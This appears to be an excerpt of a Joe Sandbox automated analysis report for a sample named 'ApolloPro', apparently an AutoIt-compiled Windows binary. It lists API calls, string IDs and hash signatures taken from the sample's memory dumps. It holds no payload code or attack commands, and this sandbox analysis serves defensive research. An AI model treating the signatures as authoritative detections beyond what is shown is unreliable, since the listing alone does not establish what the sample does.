                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                              • String ID: `=l$`=l$h=l
                                                                                              • API String ID: 3902256705-1239233958
                                                                                              • Opcode ID: 10770952801450fa4396d45637652e4432d31442c6fed9ba5240940169345110
                                                                                              • Instruction ID: 9ca7f47c64fb6064f29136c5cff9f6a8b21304f4f36d1e83f43311ef9783d423
                                                                                              • Opcode Fuzzy Hash: 10770952801450fa4396d45637652e4432d31442c6fed9ba5240940169345110
                                                                                              • Instruction Fuzzy Hash: C1F0F93050421DA6CB20BE58DC15EEE7BAE9F01312F10482DFC04A6781DF719B88C2D4
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 1559183368-0
                                                                                              • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                                              • Instruction ID: 89174d865b1a8c9bae7f4271c6bf370eda8fb2ecf2f58049f753cfd1764a10e2
                                                                                              • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                                              • Instruction Fuzzy Hash: CB51D930A00B45DBDB248F79C8985AE77A7AF04322F24876DFC26963E0D7709D598B40
                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006352E6
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0063534A
                                                                                              • TranslateMessage.USER32(?), ref: 00635356
                                                                                              • DispatchMessageW.USER32(?), ref: 00635360
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Peek$DispatchTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 1795658109-0
                                                                                              • Opcode ID: f342a66744f5fcf97b5cd5c9499033ee8b98ad68225c386ed7edd94a96653b95
                                                                                              • Instruction ID: 986b172cfeb2bc602128cc916f487d6123de06bf02e9c7ba46018ea37576706c
                                                                                              • Opcode Fuzzy Hash: f342a66744f5fcf97b5cd5c9499033ee8b98ad68225c386ed7edd94a96653b95
                                                                                              • Instruction Fuzzy Hash: 1631C430A08B069BFB309B64DC44FFA77EB9B01344F14106AE523972E1E7B5A986D791
                                                                                              APIs
                                                                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00631275,SwapMouseButtons,00000004,?), ref: 006312A8
                                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00631275,SwapMouseButtons,00000004,?), ref: 006312C9
                                                                                              • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00631275,SwapMouseButtons,00000004,?), ref: 006312EB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpenQueryValue
                                                                                              • String ID: Control Panel\Mouse
                                                                                              • API String ID: 3677997916-824357125
                                                                                              • Opcode ID: 4110fde06af44f910d7a04b43eda660f6c5dfdc9591704a07bc9e40b3654fb91
                                                                                              • Instruction ID: 01eb4c2716ff51b5bee8f0358c04f534b9f5035d724a527574dcc7cdcb8f7ec5
                                                                                              • Opcode Fuzzy Hash: 4110fde06af44f910d7a04b43eda660f6c5dfdc9591704a07bc9e40b3654fb91
                                                                                              • Instruction Fuzzy Hash: C9112A75614208FFEB208FA4DC84EEFBBB9EF06745F105559F805DB210D6719E4097A0
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 00645B58
                                                                                                • Part of subcall function 006456F8: _memset.LIBCMT ref: 00645787
                                                                                                • Part of subcall function 006456F8: _wcscpy.LIBCMT ref: 006457DB
                                                                                                • Part of subcall function 006456F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006457EB
                                                                                              • KillTimer.USER32(?,00000001,?,?), ref: 00645BAD
                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00645BBC
                                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00680D7C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
APIs
  • Part of subcall function 006449C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,006427AF,?,00000001), ref: 006449F4
• _free.LIBCMT ref: 0067FB04
• _free.LIBCMT ref: 0067FB4B
  • Part of subcall function 006429BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00642ADF
Strings
• Bad directive syntax error, xrefs: 0067FB33
Similarity
• API ID: _free$CurrentDirectoryLibraryLoad
• String ID: Bad directive syntax error
Similarity
• API ID: _memmove
• String ID: AU3! ?l$EA06
APIs
  • Part of subcall function 00644AB2: __fread_nolock.LIBCMT ref: 00644AD0
• _wcscmp.LIBCMT ref: 00699DE1
• _wcscmp.LIBCMT ref: 00699DF4
Similarity
• API ID: _wcscmp$__fread_nolock
• String ID: FILE
APIs
• _memset.LIBCMT ref: 0068032B
• GetOpenFileNameW.COMDLG32(?), ref: 00680375
  • Part of subcall function 00650284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00642A58,?,00008000), ref: 006502A4
  • Part of subcall function 006509C5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006509E4
Similarity
• API ID: Name$Path$FileFullLongOpen_memset
• String ID: X
APIs
• _memset.LIBCMT ref: 006459F9
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 00645A9E
• Shell_NotifyIconW.SHELL32(00000001,?), ref: 00645ABB
Similarity
• API ID: IconNotifyShell_$_memset
• String ID:
APIs
• __FF_MSGBANNER.LIBCMT ref: 00655953
  • Part of subcall function 0065A39B: __NMSG_WRITE.LIBCMT ref: 0065A3C2
  • Part of subcall function 0065A39B: __NMSG_WRITE.LIBCMT ref: 0065A3CC
• __NMSG_WRITE.LIBCMT ref: 0065595A
  • Part of subcall function 0065A3F8: GetModuleFileNameW.KERNEL32(00000000,006F53BA,00000104,?,00000001,00651003), ref: 0065A48A
  • Part of subcall function 0065A3F8: ___crtMessageBoxW.LIBCMT ref: 0065A538
  • Part of subcall function 006532CF: ___crtCorExitProcess.LIBCMT ref: 006532D5
  • Part of subcall function 006532CF: ExitProcess.KERNEL32 ref: 006532DE
  • Part of subcall function 00658D58: __getptd_noexit.LIBCMT ref: 00658D58
• RtlAllocateHeap.NTDLL(00DC0000,00000000,00000001,?,?,?,?,00651003,?,0000FFFF), ref: 0065597F
Similarity
• API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
• String ID:
APIs
• _free.LIBCMT ref: 006992D6
  • Part of subcall function 00652F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00659C54,00000000,00658D5D,006559C3,?), ref: 00652F99
  • Part of subcall function 00652F85: GetLastError.KERNEL32(00000000,?,00659C54,00000000,00658D5D,006559C3,?), ref: 00652FAB
• _free.LIBCMT ref: 006992E7
• _free.LIBCMT ref: 006992F9
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
APIs
• GetCurrentProcess.KERNEL32(0000002C,00000000,?,00000002,00000000,?,00697016,00000000,?,0069710A,00000000,00000000,00672F49), ref: 00697237
• GetCurrentProcess.KERNEL32(?,00000000,?,00697016,00000000,?,0069710A,00000000,00000000,00672F49), ref: 0069723F
• DuplicateHandle.KERNELBASE(00000000,?,00697016,00000000,?,0069710A,00000000,00000000,00672F49), ref: 00697246
                                                                                              Similarity
                                                                                              • API ID: CurrentProcess$DuplicateHandle
                                                                                              • String ID:
                                                                                              • API String ID: 1294930198-0
                                                                                              • Opcode ID: 93ad05d9d6deef7f66d195caf3aeb0d39438faae983b5b3e5d49ddb8cad1d7b5
                                                                                              • Instruction ID: 37e000369ef15d9776e3986342fb9332466183f3eebc6ef303a650e9e2c26a74
                                                                                              • Opcode Fuzzy Hash: 93ad05d9d6deef7f66d195caf3aeb0d39438faae983b5b3e5d49ddb8cad1d7b5
                                                                                              • Instruction Fuzzy Hash: 16D02E3A020300FFEB011BE5EC0DF3B7B3EDBC1B22F20401AF204866109A7485015620
                                                                                              APIs
                                                                                                • Part of subcall function 006977EB: InterlockedExchange.KERNEL32(?,?), ref: 006977FE
                                                                                                • Part of subcall function 006977EB: EnterCriticalSection.KERNEL32(?,?,0063C2B6,?,?), ref: 0069780F
                                                                                                • Part of subcall function 006977EB: TerminateThread.KERNEL32(00000000,000001F6,?,0063C2B6,?,?), ref: 0069781C
                                                                                                • Part of subcall function 006977EB: WaitForSingleObject.KERNEL32(00000000,000003E8,?,0063C2B6,?,?), ref: 00697829
                                                                                                • Part of subcall function 006977EB: InterlockedExchange.KERNEL32(?,000001F6), ref: 0069783C
                                                                                                • Part of subcall function 006977EB: LeaveCriticalSection.KERNEL32(?,?,0063C2B6,?,?), ref: 00697843
                                                                                              • CloseHandle.KERNELBASE(?,?,006970DF), ref: 0069708A
                                                                                              • CloseHandle.KERNEL32(?,?,006970DF), ref: 00697093
                                                                                              • DeleteCriticalSection.KERNEL32(?,?,006970DF), ref: 006970A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$CloseExchangeHandleInterlocked$DeleteEnterLeaveObjectSingleTerminateThreadWait
                                                                                              • String ID:
                                                                                              • API String ID: 2929296749-0
                                                                                              • Opcode ID: cac5bb6cc73d0520b23a6a164f794afdfa129f9123686acea5be5e0b9c1919c6
                                                                                              • Instruction ID: 966c6a68b2ea3d22f3eb67b27901bffe64f67cbe86e7c3b1753518ce28946e9b
                                                                                              • Opcode Fuzzy Hash: cac5bb6cc73d0520b23a6a164f794afdfa129f9123686acea5be5e0b9c1919c6
                                                                                              • Instruction Fuzzy Hash: 85E0E236000687EBCB812FA4FC08CA9BF7BBF487113241526F40986A70DB71A4A4CB51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: CALL
                                                                                              • API String ID: 0-4196123274
                                                                                              • Opcode ID: 9e2ad0f712e534a4cbeab1e15b049f1ece516c4cf1d855b0ca33f01c05662856
                                                                                              • Instruction ID: f2dcd44f624c981bdedb05e7db3b2c13b7dc5c7a4cf6d8ac53a5b983d3dfe6b2
                                                                                              • Opcode Fuzzy Hash: 9e2ad0f712e534a4cbeab1e15b049f1ece516c4cf1d855b0ca33f01c05662856
                                                                                              • Instruction Fuzzy Hash: 43325874508301EFDB64DF14C590A6AB7E2BF85300F15896DF88A9B362D731ED85CB86
                                                                                              APIs
                                                                                              • _strcat.LIBCMT ref: 006AE20C
                                                                                                • Part of subcall function 00634D37: __itow.LIBCMT ref: 00634D62
                                                                                                • Part of subcall function 00634D37: __swprintf.LIBCMT ref: 00634DAC
                                                                                              • _wcscpy.LIBCMT ref: 006AE29B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __itow__swprintf_strcat_wcscpy
                                                                                              • String ID:
                                                                                              • API String ID: 1012013722-0
                                                                                              • Opcode ID: 627e2fbb702d1a9299b5b80a6af60f801f4141ae77acff0461317d209c043c06
                                                                                              • Instruction ID: 6ce4e4b2d9ac899a071c6cdf27d739c953ecc7d653d1f08a5bc3447e814309a3
                                                                                              • Opcode Fuzzy Hash: 627e2fbb702d1a9299b5b80a6af60f801f4141ae77acff0461317d209c043c06
                                                                                              • Instruction Fuzzy Hash: 05913835A00605DFCB58EF18C5919A9B7E6FF4A310B55809EE80A8F362DB32ED41CF85
                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE ref: 00650ED5
                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 00650EE7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateHandleSnapshotToolhelp32
                                                                                              • String ID:
                                                                                              • API String ID: 3280610774-0
                                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                              • Instruction ID: af5c284bca429ddf20b2a657288493416dd7d9ca8cae46508e69c95c864e43f1
                                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                              • Instruction Fuzzy Hash: DB31B771A0010A9BE718DF58C4819A9F7A6FF59301F788AA5E809CB352E731EDC5CB80
                                                                                              APIs
                                                                                              • IsThemeActive.UXTHEME ref: 00645FEF
                                                                                                • Part of subcall function 0065359C: __lock.LIBCMT ref: 006535A2
                                                                                                • Part of subcall function 0065359C: DecodePointer.KERNEL32(00000001,?,00646004,00688892), ref: 006535AE
                                                                                                • Part of subcall function 0065359C: EncodePointer.KERNEL32(?,?,00646004,00688892), ref: 006535B9
                                                                                                • Part of subcall function 00645F00: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00645F18
                                                                                                • Part of subcall function 00645F00: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00645F2D
                                                                                                • Part of subcall function 00645240: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0064526C
                                                                                                • Part of subcall function 00645240: IsDebuggerPresent.KERNEL32 ref: 0064527E
                                                                                                • Part of subcall function 00645240: GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 006452E6
                                                                                                • Part of subcall function 00645240: SetCurrentDirectoryW.KERNEL32(?), ref: 00645366
                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 0064602F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                              • String ID:
                                                                                              • API String ID: 1438897964-0
                                                                                              • Opcode ID: 28add45b4bc5e1f4aba2c7f5ff835b1248095db79705771aa4ed82ea56493f0c
                                                                                              • Instruction ID: f8a0d9c3aaf41c8db4f00c206baac15fbab0d34861f1ffdf798d1cbe97417640
                                                                                              • Opcode Fuzzy Hash: 28add45b4bc5e1f4aba2c7f5ff835b1248095db79705771aa4ed82ea56493f0c
                                                                                              • Instruction Fuzzy Hash: 6811AF719083019FC310EF68ED0592AFBEAEF99710F00451EF444872B2DBB0AA49CF96
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __lock_file_memset
                                                                                              • String ID:
                                                                                              • API String ID: 26237723-0
                                                                                              • Opcode ID: a57e2f260272770cbdef7bd1bcf94dcbaff173a0b0d5453d1c6c67ff2a5ca49e
                                                                                              • Instruction ID: 55f330fffe90176f111adbfd0f0f4d0520b2a19e8745408a1171c1c3ed9ecb53
                                                                                              • Opcode Fuzzy Hash: a57e2f260272770cbdef7bd1bcf94dcbaff173a0b0d5453d1c6c67ff2a5ca49e
                                                                                              • Instruction Fuzzy Hash: 9701D431800758EBCF51AF66CC069CF7B63AF90362F144119BC252B2A1DB318A19DF91
                                                                                              APIs
                                                                                                • Part of subcall function 00658D58: __getptd_noexit.LIBCMT ref: 00658D58
                                                                                              • __lock_file.LIBCMT ref: 0065560B
                                                                                                • Part of subcall function 00656E3E: __lock.LIBCMT ref: 00656E61
                                                                                              • __fclose_nolock.LIBCMT ref: 00655616
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                              • String ID:
                                                                                              • API String ID: 2800547568-0
                                                                                              • Opcode ID: 08d47782d167794e3fba26e177a3e666966ae4138e9b128321578ae7ba51c2fb
                                                                                              • Instruction ID: 915a2adf1442599c01535af7a6b2be7e08effd6411a97df28952293937fb3868
                                                                                              • Opcode Fuzzy Hash: 08d47782d167794e3fba26e177a3e666966ae4138e9b128321578ae7ba51c2fb
                                                                                              • Instruction Fuzzy Hash: 43F0F0B1802B059AD7906B25881A76E77E36F00333F21820DAC26AB1D1DB7C4A0A8B49
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000014,00000FA0,00000001,00000000,?,0069710A,00000000,00000000,00672F49), ref: 00696FFF
                                                                                              • InterlockedExchange.KERNEL32(00000034,00000000), ref: 00697021
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
                                                                                              • String ID:
                                                                                              • API String ID: 4104817828-0
                                                                                              • Opcode ID: af842886a75f91d8bef817d71559643626c9f9cc1f6208df4172892dbb5edf3c
                                                                                              • Instruction ID: c8e29ee3e2fef4938270a5e20040e92cccea25f5737fea7ac867ae72a9d1bb55
                                                                                              • Opcode Fuzzy Hash: af842886a75f91d8bef817d71559643626c9f9cc1f6208df4172892dbb5edf3c
                                                                                              • Instruction Fuzzy Hash: 41F034B11107059FD3209F56D948CA7FBEDEF84710B00882EE48A87A10C7B4A501CB61
                                                                                              APIs
                                                                                              • __lock_file.LIBCMT ref: 00655EB4
                                                                                              • __ftell_nolock.LIBCMT ref: 00655EBF
                                                                                                • Part of subcall function 00658D58: __getptd_noexit.LIBCMT ref: 00658D58
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                              • String ID:
                                                                                              • API String ID: 2999321469-0
APIs
• _memset.LIBCMT ref: 00645AEF
• Shell_NotifyIconW.SHELL32(00000002,?), ref: 00645B1F
Similarity
• API ID: IconNotifyShell__memset
• String ID:
• API String ID: 928536360-0
APIs
• ___crtCorExitProcess.LIBCMT ref: 006532D5
  • Part of subcall function 0065329B: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,?,?,?,006532DA,00651003,?,00659EEE,000000FF,0000001E,006ECE28,00000008,00659E52,00651003,00651003), ref: 006532AA
  • Part of subcall function 0065329B: GetProcAddress.KERNEL32(?,CorExitProcess), ref: 006532BC
• ExitProcess.KERNEL32 ref: 006532DE
Similarity
• API ID: ExitProcess$AddressHandleModuleProc___crt
• String ID:
• API String ID: 2427264223-0
Similarity
• API ID: LoadString$__swprintf
• String ID:
• API String ID: 207118244-0
APIs
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
APIs
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
APIs
  • Part of subcall function 00644B29: FreeLibrary.KERNEL32(00000000,?), ref: 00644B63
  • Part of subcall function 0065547B: __wfsopen.LIBCMT ref: 00655486
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,006427AF,?,00000001), ref: 006449F4
  • Part of subcall function 00644ADE: FreeLibrary.KERNEL32(00000000), ref: 00644B18
  • Part of subcall function 006448B0: _memmove.LIBCMT ref: 006448FA
Similarity
• API ID: Library$Free$Load__wfsopen_memmove
• String ID:
